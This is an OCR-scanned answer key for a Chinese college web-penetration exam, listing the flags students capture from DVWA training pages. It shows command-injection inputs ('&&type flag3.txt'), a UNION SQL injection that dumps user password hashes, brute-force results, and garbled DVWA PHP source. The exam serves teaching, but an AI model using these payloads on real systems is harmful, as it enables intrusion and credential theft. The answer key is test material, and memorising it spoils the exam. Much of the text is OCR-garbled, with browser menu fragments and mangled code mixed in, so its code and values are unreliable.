web渗透基础A卷答案.docx

得分评卷人C1 命 view-source:*最常访问 巴火狐官方站点，新手上路 目常用网址E3京东商城 VOCX IICUU . x MA / Z苏州市职业大学20172018学年第二学期试卷标准答案及评分标准web基础渗透（分散 A卷开卷上机）出卷人 课题组出卷人所在学院（部）计算机工程学院使用班级16网络1一、提交flagl （每题5分，共30分，最多可以提交6个flagl）<input type ="text" name= " u s er namez/ > <br />Password：<br /><input type="password" AUTOCOMPLETE="off" name="password"Xbr /><br /><input type="submit" value="Login“ name="Login”)</form><!flagl bru tepage !></div>)Vulnerability: Command Inj X view-source:0最常访问a火狐官方站点新手上路 目常用网址JD京东商城<form name="ping" action= # method="post"<P>Enter an IP address:<input type="text" name二ip size="30”><input type="submit“ name="Submit" value:"Submit”)</p></form><!flagl ming_ling_zhu_ru6page!> G* Q G* Q view-source:*最常访问包火狐官方站点 新手上路巴常用网址圆京东商城<br /><input type="submit“ name二Upload" value:"Upload” /></form>fflagl load_up_file9page!> view-source: view-source:京东商城JD</div>*最常访问囱火狐官方站点 新手上路包常用网址<P>User ID:<select name="id'Xoption value=zl，z>l</option><option value= 2，z>2</optionX<input type="submit“ name="Submit" value="Submit”</p><! flag 1 SQLOpage!>echo ”<img src=*Savatar* />"else / Login failedsleep( 2 );echo *<pre><br />Username and/or password incorrect. </pre>"mysQl_close();)/flaglbrute_*source view-source:京东商城JD?>*最常访问图火狐官方站点安新手上路 H常用网址<P>User ID:<select name=，idz/><option value=optionXoption value=2>2</ optionXop<input type= submit name= Submit value= Submit ></p><! flagl SQL_xiazhu6page !></fonn>Command Injection SourceI <*?phpi sse*t <S_POST L ' Sutlomi x' J/ /GetinputStaHaQt = S_REQUHST E ' i.p' 1 ;/SettoXacRlisxSsi_xk>sT i XuX ions = wux-zray < '&&， => ' 9 , '；' =>> ；/ Removeany of thechai-'acxairs inxHe* a.irx'ayCV> 1 auk 1 i sx).Sta一寻 etsxx*_replace <aNHav kevs. S s x1 tux 1 ons> ,$ sutosx x t vix i ons,/D&t ermi ne OS and exacup e The pi rtg command.i f C sx.ri sT-r <php_“name( s* >, Windows NT> )/WindowsScmd =shell_exeu <' r>i.ns * St;auirset ) ;> eise ( / LxScmd =stie 11_exe>u、' ixns- u 4'. S ,t eix-se»l:> ;/ / FQ dbauk £ozr the end u.sex- wuho “<px-e> Scradj V/px*w> ;)=£ lag： 1(QKeua& soxixu &y8SQL Injection (Blind) Source<?phpif ( isset ( $_POST? Submit)/ Get inputSid = S_POST 'id'Sid = m5rSQl_real_escape_str ing (last_namelast_nameFROM users WHEREuser_id = Sid;”;suppress mysql errors/ Check database Sgetid= "SELECT first_name,Sresult = mysQl_Query( Sgetid/ Get resultsSnum = ®nysql_rmmrows ( if( Snum >01/ Feedback for echo '<pre>Userelse (/ Feedback for echo '<pre>UserSresultend user ID exists inend user ID is MISSINGThecharacterthe database. </pre>Jfrom the database.suppresseserrorsf lagl so easypage !) </pre>J :/mvsql_close();得分得分评卷人二、提交flag2 (每题10分，共20分,最多可以提交2个flag2)1 flag2 bruteVulnerability： Brute ForceLoginLoginLoginWelcome to the password protected area admin ;flag2Ox62727574654O)2、flag hello word!Vulnerability: Command InjectionPing a deviceEnter an IP address: &&type flag2.txt: SubmitPinging 192. 168. 190. 131 with 32 bytes of data:Reply froniReply fromReply fromReply from192.168.190. 131: bytes=32192.168.190. 131: bytes=32192.168.190. 131: bytes=32192. 168. 190. 131: bytes=32TTL=64TTL=64TTL=64TTL=64Ping statistics for 192.168.190. 131：Packets： Sent = 4, Received = 4, Lost = 0 (0% loss),Approximate round trip times in milli-seconds：Minimum = 0ms, Maximum = 0ms, Average = 0msZmxhZ3toZWxsbyB3b3JkIX0=0最常访问 B火狐官方站点 &新手上路围常用网址JD京东商城flag2:1261734558interceptforwardVulnerability: S得分评卷人optionshistorydropintercept三、提交flag3 （每题15分，共30分，最多可以提交2个flag3）1、flag3 DVWAvulnerabmlitiesVulnerability: Command InjectionPing a deviceEnter an IP address: 92.168.190.131&&type .flag3.txt SubmitPinging 192. 168. 190. 131 with 32 bytes of data:Reply from 192.168.190. 131: bytes=32 time<lms TTL=64Reply from Reply froni Reply from: bytes=32 time<lms TTL=64: bytes=32 time<lms TTL=64192. 168. 190. 131:bytes=32time<lms TTL=64Ping statistics for 192.168.190.131:Packets： Sent = 4, Received = 4,Lost = 0 (0% loss),Approximate round trip times in milli-seconds：Minimum = 0ms, Maximum = 0ms, Average = 0ms 2mxhZzN7RFZXQVx2WxuZXJhY:nlsaXRpZXN92、 1f手上路围常用网址应京东商城>port 180 use SSLresponserawheadershexhtmlrender1337cbr />Surname: 8d3533d75ae2c3966d7e0d4fcc69216b</pre><pre>ID: 1 union select user,password from users <br />First name : pablo<br />Surname: 0dl07d09f5bbe40cade3de5c71e9e9b7</pre><pre>ID: 1 imion select user zpassword from users <br ,/>First name : smithy<br />Surname: 5f4dcc3b5aa765d61d8327deb882cf99</pre><pre>ID: 1 imion select user password from users <br />First name: flag<br />Surname: flag3:you win</pre></d iv><h2>More Information</h2><ul><lixa href-F, : /hiderefer . com/? : /wwv. secur iteam /secur ityreviews/SDP0NlP76E. html”target=,_blan)ir,> : / secur it earn. com/securityreviews/5DP0HlP76E .html</a></ li><li><a href =, : /hiderefer . com/ ? s: / /en. Wikipedia, org/wiki/SQL_injection,rItarget=n_blankrn> .Wikipedia.org/wiki/SQL_injection</a></li><li><a href=M"target3,r_blank,r> : /f erriiJx.mavitiina. com/sql-injection-cheatsheet-oku/</a></ li>v 1 i=1 il < II > II0 matches得分评卷人四、提交flag4 （每题20分，共20分，最多可以提交1个flag4）1、c:flag4.rar加压密码为“admin”密文MD5加密，解密为后名为flag4 admin ）9c：Documents andSettingsDocuments andSettings言藏此驱动器的内容普加/删除程序更索文件或文件夹SoftlnstDownloadsDriverProgram FilesWINDOWSxajnppeula. 1028. txt 文本文档 18 KB和文件夹任务属命名这个文件多动这个文件盘制这个文件辱这个文件发布到Web白电子邮件形式发送此 £件月赊这个文件eula. 1033. txt文本文档10 KBeula. 2052. txt文本文档18 KBeula 1036.txt文本文档18 KBeula. 3082. txt 文本文档 18 KBeula 1040. txt文本文档18 KBeula. 1041. txt文本文档1 KBglobdata. ini 配置设置2 KBinstall. exe External Installer Microsoft Corpor.位置戈的电脑 克的文档 专享文档UI Wrapper Resou.UI Wrapper Resou.YC_RED. MSIWindows Installe. 228 KBinstall. res. 1031.Ressourcen-DLL f.install. res. 1042.UI EHffl己仝上DLLinstall. res. 1033.9 0,21022.8UI Wrapper Rtsou.install. res. 2052.用户界面包装资源install. res. 1036.9.0 21022.8UI Wrapper Resou.install, res. 3082.Archivo DLL de r .UJE E 用凶uPythonzTeula. 1031. txt 文本文档18 KBula. 1042. txt 文本文档 18 KBinstall, ini 配置设置1 KBinstall. r®s. 1040.9.0.21022.8 DLL di risorse d.VU RED. cabWinRAR压缩文件 1,409 KBvcredist. bmp96 x 48BMP图像tlagA. rar hnRAR压缩文件 ；KB2、在系统桌面上flag4.rar加压码为“#3a” ，解密后明文为"flag4passwordv感谢您的支持与使用如果内容侵权请联系删除仅供教学交流使用